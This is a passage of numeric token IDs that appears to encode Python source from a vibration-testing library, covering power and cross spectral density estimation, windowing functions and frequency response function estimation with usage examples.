16, 11, 640, 13, 43358, 58, 16, 60, 4008, 198, 220, 220, 220, 13163, 2336, 11, 357, 897, 16, 11, 7877, 17, 8, 796, 458, 83, 13, 7266, 489, 1747, 7, 17, 11, 16, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 29487, 7, 2435, 58, 15, 11, 25, 4357, 87, 58, 15, 11, 25, 12962, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 7839, 10786, 7575, 2106, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 7575, 2106, 11537, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 87, 18242, 10786, 7575, 357, 2363, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 7575, 357, 2363, 8, 11537, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 2645, 9608, 10786, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3, 87, 7, 83, 8, 3, 11537, 628, 220, 220, 220, 3082, 1133, 290, 7110, 262, 44619, 806, 6582, 12109, 13, 628, 220, 220, 220, 13163, 2030, 80, 62, 35138, 11, 350, 5324, 796, 410, 83, 13, 292, 67, 7, 87, 11, 640, 11, 2344, 593, 480, 2625, 7637, 768, 1600, 257, 303, 28, 30388, 7, 25101, 4008, 198, 220, 220, 220, 13163, 7877, 17, 13, 29487, 7, 19503, 80, 62, 35138, 11, 1160, 9, 37659, 13, 6404, 940, 7, 47, 5324, 58, 15, 11, 47715, 4008, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 88, 2475, 26933, 12, 7029, 11, 1802, 12962, 198, 220, 220, 220, 13841, 7029, 11, 1802, 8, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 87, 18242, 10786, 35324, 357, 7399, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 35324, 357, 7399, 8, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 2645, 9608, 10786, 3705, 35, 357, 53, 1174, 17, 14, 7399, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3705, 35, 357, 53, 1174, 17, 14, 7399, 8, 11537, 628, 220, 220, 220, 1002, 356, 2811, 262, 938, 2063, 286, 262, 37410, 12109, 11, 284, 19607, 262, 198, 220, 220, 220, 9103, 11, 356, 460, 8551, 262, 7838, 1176, 319, 262, 6737, 13, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 277, 11, 350, 5324, 796, 1067, 21282, 7, 87, 11, 2124, 11, 256, 11, 2344, 593, 480, 28, 7972, 593, 480, 11, 257, 303, 28, 1015, 8, 198, 220, 220, 220, 350, 5324, 796, 350, 5324, 13, 5305, 198, 220, 220, 220, 1441, 277, 11, 350, 5324, 628, 198, 4299, 1067, 21282, 7, 87, 11, 331, 11, 256, 11, 2344, 593, 480, 2625, 23108, 1600, 257, 303, 28, 30388, 7, 17821, 8, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 27131, 378, 262, 3272, 10958, 357, 6477, 10958, 8, 12109, 1022, 734, 10425, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2124, 11, 331, 1058, 26515, 198, 220, 220, 220, 220, 220, 220, 220, 6060, 7177, 357, 77, 2124, 399, 2124, 285, 8, 810, 299, 318, 262, 1271, 286, 15736, 11, 285, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1271, 286, 10256, 13, 198, 220, 220, 220, 256, 1058, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 3862, 7177, 357, 16, 2124, 399, 8, 198, 220, 220, 220, 2344, 593, 480, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 6530, 286, 4324, 278, 2163, 284, 779, 13, 4091, 4600, 17497, 44646, 198, 220, 220, 220, 257, 303, 1058, 20512, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 13475, 1255, 393, 407, 30, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 277, 1058, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 15879, 357, 16, 2124, 399, 8, 198, 220, 220, 220, 350, 5431, 1058, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5231, 418, 806, 6582, 357, 77, 2124, 399, 8, 393, 357, 77, 2124, 399, 2124, 285, 8, 611, 407, 16449, 13, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 422, 629, 541, 88, 1330, 6737, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 299, 32152, 13, 75, 1292, 70, 355, 8591, 628, 220, 220, 220, 2980, 378, 257, 642, 1218, 1332, 6737, 11, 257, 838, 569, 264, 500, 6769, 379, 2026, 26109, 11, 26940, 416, 198, 220, 220, 220, 657, 13, 8298, 569, 1174, 17, 14, 7399, 286, 2330, 7838, 35846, 379, 352, 37597, 13, 628, 220, 220, 220, 13163, 6291, 62, 19503, 80, 796, 352, 68, 18, 198, 220, 220, 220, 13163, 256, 20311, 796, 642, 198, 220, 220, 220, 13163, 43237, 62, 19503, 80, 28, 1120, 198, 220, 220, 220, 13163, 317, 28, 940, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 657, 13, 18005, 1635, 6291, 62, 19503, 80, 1220, 362, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 317, 14, 16, 68, 1065, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 283, 858, 7, 15, 11, 83, 20311, 11, 16, 14, 39873, 62, 19503, 80, 8, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 3447, 1758, 7, 2435, 11, 357, 16, 11, 532, 16, 4008, 198, 220, 220, 220, 13163, 2124, 796, 317, 9, 37659, 13, 31369, 7, 17, 9, 37659, 13, 14415, 9, 82, 328, 62, 19503, 80, 9, 2435, 8, 198, 220, 220, 220, 13163, 2124, 796, 2124, 1343, 45941, 13, 25120, 13, 11265, 7, 9888, 28, 37659, 13, 31166, 17034, 7, 3919, 786, 62, 6477, 828, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 16193, 16, 11, 640, 13, 43358, 58, 16, 60, 4008, 198, 220, 220, 220, 13163, 2336, 796, 458, 83, 13, 26875, 3419, 198, 220, 220, 220, 13163, 458, 83, 13, 7266, 29487, 7, 17, 11, 16, 11, 16, 8, 198, 220, 220, 220, 1279, 6759, 29487, 8019, 986, 29, 198, 220, 220, 220, 13163, 458, 83, 13, 29487, 7, 2435, 58, 15, 11, 25, 4357, 87, 58, 15, 11, 25, 12962, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 458, 83, 13, 7839, 10786, 7575, 2106, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 7575, 2106, 11537, 198, 220, 220, 220, 13163, 458, 83, 13, 87, 18242, 10786, 7575, 357, 2363, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 7575, 357, 2363, 8, 11537, 198, 220, 220, 220, 13163, 458, 83, 13, 2645, 9608, 10786, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3, 87, 7, 83, 8, 3, 11537, 628, 220, 220, 220, 3082, 1133, 290, 7110, 262, 44619, 806, 6582, 12109, 13, 198, 220, 220, 220, 13163, 2030, 80, 62, 35138, 11, 350, 5324, 796, 410, 83, 13, 292, 67, 7, 87, 11, 640, 11, 2344, 593, 480, 2625, 7637, 768, 1600, 257, 303, 28, 30388, 7, 25101, 4008, 198, 220, 220, 220, 13163, 458, 83, 13, 7266, 29487, 7, 17, 11, 16, 11, 17, 8, 198, 220, 220, 220, 1279, 6759, 29487, 8019, 986, 29, 198, 220, 220, 220, 13163, 458, 83, 13, 29487, 7, 19503, 80, 62, 35138, 11, 1160, 9, 37659, 13, 6404, 940, 7, 47, 5324, 58, 15, 11, 47715, 4008, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 458, 83, 13, 88, 2475, 26933, 12, 7029, 11, 1802, 12962, 198, 220, 220, 220, 13841, 7029, 11, 1802, 8, 198, 220, 220, 220, 13163, 458, 83, 13, 87, 18242, 10786, 35324, 357, 7399, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 35324, 357, 7399, 8, 11537, 198, 220, 220, 220, 13163, 458, 83, 13, 2645, 9608, 10786, 3705, 35, 357, 53, 1174, 17, 14, 7399, 8, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3705, 35, 357, 53, 1174, 17, 14, 7399, 8, 11537, 198, 220, 220, 220, 13163, 2336, 13, 33464, 62, 39786, 3419, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 1303, 256, 62, 43358, 796, 256, 13, 43358, 198, 220, 220, 220, 256, 796, 256, 13, 2704, 41769, 3419, 198, 220, 220, 220, 611, 18896, 7, 83, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 288, 83, 796, 256, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 288, 83, 796, 256, 58, 17, 60, 532, 256, 58, 16, 60, 628, 220, 220, 220, 611, 288, 83, 19841, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 1639, 1908, 287, 2089, 1366, 13, 16978, 256, 318, 4633, 13, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4222, 2198, 534, 17311, 2637, 8, 628, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 11201, 392, 62, 67, 12078, 7, 87, 11, 16488, 28, 15, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 11201, 392, 62, 67, 12078, 7, 87, 11, 16488, 28, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 331, 796, 45941, 13, 11201, 392, 62, 67, 12078, 7, 88, 11, 16488, 28, 15, 8, 198, 220, 220, 220, 220, 220, 220, 220, 331, 796, 45941, 13, 11201, 392, 62, 67, 12078, 7, 88, 11, 16488, 28, 17, 8, 198, 220, 220, 220, 299, 796, 2124, 13, 43358, 58, 16, 60, 628, 220, 220, 220, 611, 2344, 593, 480, 318, 10352, 393, 2344, 593, 480, 13, 21037, 3419, 318, 366, 23108, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 352, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3601, 10786, 1212, 1595, 43054, 83, 670, 1865, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2344, 593, 480, 796, 2344, 593, 480, 13, 21037, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2344, 593, 480, 6624, 366, 7637, 768, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 7637, 768, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 13424, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 13424, 5404, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 3524, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 3524, 5404, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 11201, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 11201, 5404, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 2763, 76, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 2763, 2229, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 28461, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 28461, 5404, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 6624, 366, 38568, 5404, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1592, 796, 4324, 7, 87, 11, 2344, 593, 480, 11639, 38568, 5404, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 331, 796, 331, 1635, 1592, 198, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 2124, 1635, 1592, 198, 220, 220, 220, 220, 220, 220, 220, 1619, 1592, 628, 220, 220, 220, 277, 19628, 796, 45941, 13, 487, 83, 13, 81, 487, 83, 7, 88, 11, 299, 11, 16488, 28, 16, 8, 1635, 288, 83, 198, 220, 220, 220, 277, 701, 87, 796, 45941, 13, 487, 83, 13, 81, 487, 83, 7, 87, 11, 299, 11, 16488, 28, 16, 8, 1635, 288, 83, 628, 220, 220, 220, 350, 5431, 796, 45941, 13, 1102, 73, 7, 487, 17602, 8, 1635, 277, 19628, 1220, 357, 77, 1635, 288, 83, 8, 1635, 362, 628, 220, 220, 220, 611, 18896, 7, 47, 5431, 13, 43358, 8, 6624, 513, 290, 350, 5431, 13, 43358, 58, 17, 60, 1875, 352, 290, 257, 303, 25, 198, 220, 220, 220, 220, 220, 220, 220, 350, 5431, 796, 45941, 13, 32604, 7, 47, 5431, 11, 362, 8, 628, 220, 220, 220, 299, 19503, 80, 796, 352, 1220, 288, 83, 1220, 362, 198, 220, 220, 220, 277, 796, 45941, 13, 21602, 10223, 7, 15, 11, 299, 19503, 80, 11, 350, 5431, 13, 43358, 58, 16, 12962, 220, 1303, 1220, 17, 19571, 37659, 13, 14415, 628, 220, 220, 220, 1441, 277, 11, 350, 5431, 628, 198, 4299, 1216, 23411, 7, 87, 11, 277, 11, 288, 83, 11, 2344, 593, 480, 2625, 7637, 768, 1600, 257, 303, 28, 30388, 7, 17821, 828, 367, 85, 28, 30388, 7, 25101, 8, 2599, 198, 220, 220, 220, 374, 37811, 13615, 2030, 80, 11, 367, 16, 11, 367, 17, 11, 16883, 11, 367, 85, 13, 628, 220, 220, 220, 47052, 262, 1058, 11018, 25, 63, 39, 7, 73, 59, 462, 4908, 8, 63, 31902, 18261, 40480, 357, 10913, 42388, 8, 198, 220, 220, 220, 1022, 1058, 11018, 25, 63, 87, 63, 290, 1058, 11018, 25, 63, 69, 44646, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2124, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 5072, 393, 2882, 286, 1080, 198, 220, 220, 220, 277, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 5128, 284, 1080, 198, 220, 220, 220, 288, 83, 1058, 12178, 198, 220, 220, 220, 220, 220, 220, 220, 640, 2239, 286, 8405, 198, 220, 220, 220, 2344, 593, 480, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 1881, 286, 25, 289, 272, 768, 11, 8891, 2229, 11, 2042, 805, 11, 6228, 5404, 11, 3091, 5404, 198, 220, 220, 220, 257, 303, 1058, 20512, 11, 11902, 7, 17821, 13219, 3058, 8970, 198, 220, 220, 220, 220, 220, 220, 220, 1771, 393, 407, 284, 2811, 6599, 30832, 290, 7054, 30832, 393, 15284, 8246, 8782, 42388, 198, 220, 220, 220, 367, 85, 1058, 20512, 11, 11902, 7, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 15284, 262, 1058, 11018, 25, 63, 39, 62, 85, 63, 8373, 2882, 2163, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 2030, 80, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 8373, 15879, 357, 16, 87, 45, 8, 198, 220, 220, 220, 367, 16, 1058, 220, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 18261, 15553, 1058, 11018, 25, 63, 39, 62, 16, 63, 8636, 11, 357, 77, 87, 45, 8, 393, 357, 77, 87, 45, 87, 76, 8, 198, 220, 220, 220, 367, 17, 1058, 220, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 18261, 15553, 1058, 11018, 25, 63, 39, 62, 17, 63, 8636, 11, 357, 77, 87, 45, 8, 393, 357, 77, 87, 45, 87, 76, 8, 198, 220, 220, 220, 16883, 1058, 220, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 1766, 372, 590, 15553, 1058, 11018, 25, 63, 59, 28483, 2611, 61, 17, 63, 8636, 11, 357, 77, 87, 45, 8, 198, 220, 220, 220, 367, 85, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 18261, 15553, 1058, 11018, 25, 63, 39, 62, 85, 63, 8636, 11, 357, 77, 87, 45, 8, 393, 357, 77, 87, 45, 87, 76, 8, 628, 220, 220, 220, 16888, 220, 7559, 1015, 15506, 318, 8970, 284, 4277, 3815, 13, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 1330, 1630, 355, 269, 14859, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 6291, 62, 19503, 80, 796, 352, 68, 18, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 657, 13, 8298, 1635, 6291, 62, 19503, 80, 1220, 362, 198, 220, 220, 220, 13163, 317, 796, 45941, 13, 18747, 26933, 58, 15, 11, 657, 11, 352, 11, 657, 4357, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 15, 11, 657, 11, 657, 11, 352, 4357, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 25915, 2167, 11, 1802, 11, 532, 13, 17, 11, 764, 16, 4357, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 3064, 11, 532, 2167, 11, 764, 16, 11, 532, 13, 17, 11907, 8, 198, 220, 220, 220, 13163, 347, 796, 45941, 13, 18747, 26933, 58, 15, 4357, 685, 15, 4357, 685, 16, 4357, 685, 15, 11907, 8, 198, 220, 220, 220, 13163, 327, 796, 45941, 13, 18747, 26933, 58, 2327, 11, 657, 11, 657, 11, 657, 4357, 685, 15, 11, 3439, 11, 657, 11, 657, 11907, 8, 198, 220, 220, 220, 13163, 360, 796, 45941, 13, 18747, 26933, 58, 15, 4357, 685, 15, 11907, 8, 198, 220, 220, 220, 13163, 25064, 796, 269, 14859, 13, 824, 7, 32, 11, 347, 11, 327, 11, 360, 8, 198, 220, 220, 220, 13163, 19783, 796, 45941, 13, 283, 858, 7, 15, 11, 6885, 13, 17, 11, 764, 16, 8, 198, 220, 220, 220, 13163, 299, 81, 796, 764, 20, 220, 220, 1303, 657, 318, 477, 7838, 319, 5128, 198, 220, 220, 220, 13163, 329, 1312, 287, 45941, 13, 283, 858, 7, 31211, 2599, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 334, 796, 45941, 13, 25120, 13, 11265, 7, 9888, 28, 37659, 13, 31166, 17034, 7, 3919, 786, 62, 6477, 828, 2546, 28, 43701, 13, 43358, 8, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 1303, 4798, 7, 84, 8, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 256, 11, 345, 83, 11, 2124, 448, 796, 269, 14859, 13, 12072, 62, 26209, 7, 17597, 11, 19783, 11, 334, 11, 17034, 349, 28, 16, 68, 12, 1065, 8, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 611, 705, 56, 448, 6, 287, 17205, 33529, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 575, 448, 28, 37659, 13, 67, 25558, 19510, 56, 448, 11, 32015, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 48624, 9, 37659, 13, 25120, 13, 11265, 7, 9888, 28, 13, 28669, 9, 37659, 13, 19282, 7, 32015, 58, 15, 11, 25, 46570, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 28, 32015, 13, 43358, 22305, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 471, 24011, 28, 37659, 13, 67, 25558, 19510, 52, 24011, 11, 84, 33747, 16, 12, 48624, 8, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 37659, 13, 25120, 13, 11265, 7, 9888, 28, 13, 2713, 9, 37659, 13, 19282, 7, 84, 828, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 28, 84, 13, 43358, 22305, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 575, 448, 28, 32015, 10, 48624, 9, 37659, 13, 25120, 13, 11265, 7, 9888, 28, 13, 2713, 9, 37659, 13, 19282, 7, 32015, 58, 15, 11, 25, 46570, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 28, 32015, 13, 43358, 8, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 7838, 319, 5072, 318, 642, 4, 5046, 286, 5128, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 471, 24011, 28, 84, 33747, 16, 12, 48624, 27493, 37659, 13, 25120, 13, 11265, 7, 9888, 28, 13, 2713, 9, 37659, 13, 19282, 7, 84, 828, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2546, 28, 84, 13, 43358, 8, 2, 7, 16, 11, 18896, 7, 43701, 22305, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 642, 4, 7838, 6737, 319, 5128, 198, 220, 220, 220, 13163, 277, 11, 367, 5431, 16, 11, 367, 5431, 17, 11, 16883, 11, 367, 5431, 85, 796, 410, 83, 13, 8310, 23411, 7, 56, 448, 11, 471, 24011, 11, 256, 11, 367, 85, 28, 30388, 7, 17821, 4008, 198, 220, 220, 220, 13163, 410, 83, 13, 8310, 69, 29487, 7, 69, 11, 39, 5431, 17, 11, 19503, 80, 62, 9806, 28, 18, 13, 20, 11, 8177, 28, 17816, 3, 39, 23330, 1157, 92, 3, 3256, 705, 3, 39, 23330, 1065, 92, 3, 6, 12962, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 10412, 395, 25, 1343, 18831, 4061, 198, 220, 220, 220, 13163, 410, 83, 13, 8310, 69, 29487, 7, 69, 11, 45941, 13, 85, 25558, 19510, 39, 5431, 16, 58, 15, 11, 25, 4357, 367, 5431, 17, 58, 15, 11, 25, 4357, 367, 5431, 85, 58, 15, 11, 25, 12962, 828, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8177, 28, 17816, 3, 39, 23330, 1157, 12, 16, 92, 3, 41707, 3, 39, 23330, 1157, 12, 17, 92, 3, 41707, 3, 39, 23330, 1157, 12, 85, 92, 3, 6, 12962, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 10412, 395, 25, 1343, 18831, 4061, 628, 220, 220, 220, 11822, 198, 220, 220, 220, 37404, 198, 220, 220, 220, 11485, 3465, 3712, 1892, 11670, 351, 629, 541, 88, 13, 12683, 282, 5499, 198, 220, 220, 220, 11485, 766, 14508, 3712, 1058, 20786, 25, 63, 292, 67, 47671, 1058, 20786, 25, 63, 66, 3808, 67, 47671, 1058, 20786, 25, 63, 8310, 69, 29487, 44646, 198, 220, 220, 220, 11485, 6509, 3712, 289, 272, 768, 4324, 2314, 307, 6163, 1865, 13, 317, 332, 3039, 2314, 307, 198, 220, 220, 220, 220, 220, 220, 5576, 12609, 1865, 13, 198, 220, 220, 220, 11485, 284, 4598, 3712, 13268, 20430, 11, 4324, 278, 11, 3294, 5128, 13, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 611, 18896, 7, 69, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 13, 3447, 1758, 7, 16, 11, 532, 16, 11, 352, 8, 628, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 2124, 13, 3447, 1758, 7, 16, 11, 532, 16, 11, 352, 8, 628, 220, 220, 220, 611, 18896, 7, 69, 13, 43358, 8, 6624, 362, 25, 198, 220, 220, 220, 220, 220, 220, 220, 611, 357, 69, 13, 43358, 737, 9630, 7, 9806, 7, 69, 13, 43358, 4008, 6624, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 13, 3447, 1758, 7, 9806, 7, 69, 13, 43358, 828, 949, 7, 69, 13, 43358, 828, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 13, 3447, 1758, 7, 16, 11, 3509, 7, 69, 13, 43358, 828, 949, 7, 69, 13, 43358, 4008, 628, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 362, 25, 198, 220, 220, 220, 220, 220, 220, 220, 611, 357, 87, 13, 43358, 737, 9630, 7, 9806, 7, 87, 13, 43358, 4008, 6624, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 2124, 13, 3447, 1758, 7, 9806, 7, 87, 13, 43358, 828, 949, 7, 87, 13, 43358, 828, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 2124, 13, 3447, 1758, 7, 16, 11, 3509, 7, 87, 13, 43358, 828, 949, 7, 87, 13, 43358, 4008, 628, 220, 220, 220, 1303, 5740, 25, 4930, 1180, 2842, 284, 8856, 4504, 3815, 3402, 198, 220, 220, 220, 350, 487, 796, 355, 67, 7, 69, 11, 288, 83, 11, 2344, 593, 480, 28, 7972, 593, 480, 38381, 16, 60, 198, 220, 220, 220, 2030, 80, 11, 350, 26152, 796, 1067, 21282, 7, 87, 11, 277, 11, 288, 83, 11, 2344, 593, 480, 28, 7972, 593, 480, 8, 198, 220, 220, 220, 4808, 11, 350, 5324, 796, 355, 67, 7, 87, 11, 288, 83, 8, 628, 220, 220, 220, 1303, 5740, 350, 21373, 28, 1102, 73, 7, 47, 26152, 8, 318, 5625, 287, 262, 367, 16, 8782, 37, 31850, 198, 220, 220, 220, 309, 26152, 16, 796, 45941, 13, 1102, 73, 7, 47, 26152, 1220, 350, 487, 8, 198, 220, 220, 220, 309, 26152, 17, 796, 350, 5324, 1220, 350, 26152, 198, 220, 220, 220, 1303, 35886, 276, 284, 3368, 5072, 2761, 14, 14323, 489, 1958, 3848, 611, 14880, 6138, 276, 198, 220, 220, 220, 309, 26152, 85, 796, 45941, 13, 9107, 418, 62, 2339, 7, 51, 26152, 16, 8, 628, 220, 220, 220, 16883, 796, 357, 47, 26152, 1635, 45941, 13, 1102, 73, 7, 47, 26152, 29720, 5305, 1220, 350, 5324, 1220, 350, 487, 628, 220, 220, 220, 611, 367, 85, 25, 198, 220, 220, 220, 220, 220, 220, 220, 329, 1312, 287, 45941, 13, 283, 858, 7, 47, 5324, 13, 43358, 58, 16, 60, 2599, 198, 220, 220, 220, 220, 220, 220, 